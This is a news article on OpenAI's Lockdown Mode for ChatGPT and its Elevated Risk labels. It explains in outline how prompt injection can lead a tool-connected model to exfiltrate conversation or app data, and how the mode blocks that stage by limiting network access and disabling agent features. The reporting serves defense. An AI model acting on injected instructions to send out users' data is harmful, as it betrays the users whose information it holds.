OpenAI on February 13, 2026 introduced Lockdown Mode, an optional advanced security setting for ChatGPT, alongside standardized Elevated Risk labels for higher-risk capabilities across ChatGPT, ChatGPT Atlas, and Codex. According to OpenAI, Lockdown Mode is aimed at a small set of highly security-conscious users, such as executives or security teams at prominent organizations, and deterministically disables tools an attacker could use to exfiltrate data through prompt injection. OpenAI says web browsing is limited to cached content so no live network requests leave its controlled network, and capabilities such as Deep Research and Agent Mode are turned off. The feature launched for ChatGPT Enterprise, Edu, Healthcare, and Teachers plans; per OpenAI's release notes it has since expanded to all logged-in users across account types. OpenAI stresses Lockdown Mode reduces, but does not eliminate, prompt-injection risk and does not stop injected content from reaching the model.
What happened
OpenAI on February 13, 2026 introduced two prompt-injection protections for ChatGPT: Lockdown Mode, an optional advanced security setting, and standardized Elevated Risk labels for higher-risk capabilities across ChatGPT, ChatGPT Atlas, and Codex. In its announcement, OpenAI described Lockdown Mode as built for a small set of highly security-conscious users, such as executives or security teams at prominent organizations, and said it is not necessary for most users. OpenAI framed the launch as building on existing protections such as sandboxing, defenses against URL-based data exfiltration, and enterprise controls like role-based access and audit logs.
How Lockdown Mode works
According to OpenAI, Lockdown Mode deterministically disables tools and capabilities that an adversary could use to exfiltrate sensitive data from conversations or connected apps through prompt-injection attacks. OpenAI says web browsing is limited to cached content, so no live network requests leave its controlled network, and some features are disabled entirely where it cannot provide strong deterministic guarantees of data safety. OpenAI's documentation indicates Deep Research is fully disabled and Agent Mode is unavailable while the setting is on. Workspace admins enable Lockdown Mode through a role in Workspace Settings and keep granular control over which connected apps and actions remain available. OpenAI stresses an important limit: the mode does not stop injected content from reaching the model, and it reduces but does not eliminate prompt-injection risk; it instead blocks the exfiltration stage where data would be sent to an attacker.
Availability and rollout
OpenAI initially made Lockdown Mode available for ChatGPT Enterprise, ChatGPT Edu, ChatGPT for Healthcare, and ChatGPT for Teachers, and said it planned to extend the feature to consumers in the coming months. Per OpenAI's release notes, Lockdown Mode has since expanded to all logged-in users across account types and workspaces, widening availability well beyond the original business and education plans.
Why it matters
Editorial analysis: Prompt injection remains one of the most consequential unresolved security problems for agentic and tool-connected LLM deployments, where untrusted external content can hijack model behavior or siphon private context. A deterministic, capability-gating control from the most widely deployed assistant vendor gives security teams a concrete policy primitive to isolate sensitive workflows rather than relying solely on probabilistic, model-side defenses. As a generic industry pattern, narrowing permitted input and output channels in high-risk sessions is a common mitigation, and consistent risk labeling across surfaces helps users make informed choices about browsing, connectors, and agent access.
What to watch
Editorial analysis: Open questions for practitioners include the audit and logging visibility available while Lockdown Mode is active, the exact rule set that triggers the Elevated Risk label and whether admins can configure it, and how the mode behaves with third-party connectors and custom tool chains. Independent security researchers' evaluations of the mode against real prompt-injection variants will be the clearest signal of how much protection it delivers in practice.
Scoring Rationale #
A widely covered security feature from the leading AI vendor that ships a deterministic, capability-gating defense against prompt-injection data exfiltration, a top operational concern for agentic and tool-connected LLM use. It is an optional hardening setting that does not change model capabilities and is unnecessary for most users, which caps its importance, but the move to all logged-in users and the cross-surface Elevated Risk labels make it notably relevant to security-minded practitioners.
Practice interview problems based on real data
1,500+ SQL & Python problems across 15 industry datasets — the exact type of data you work with.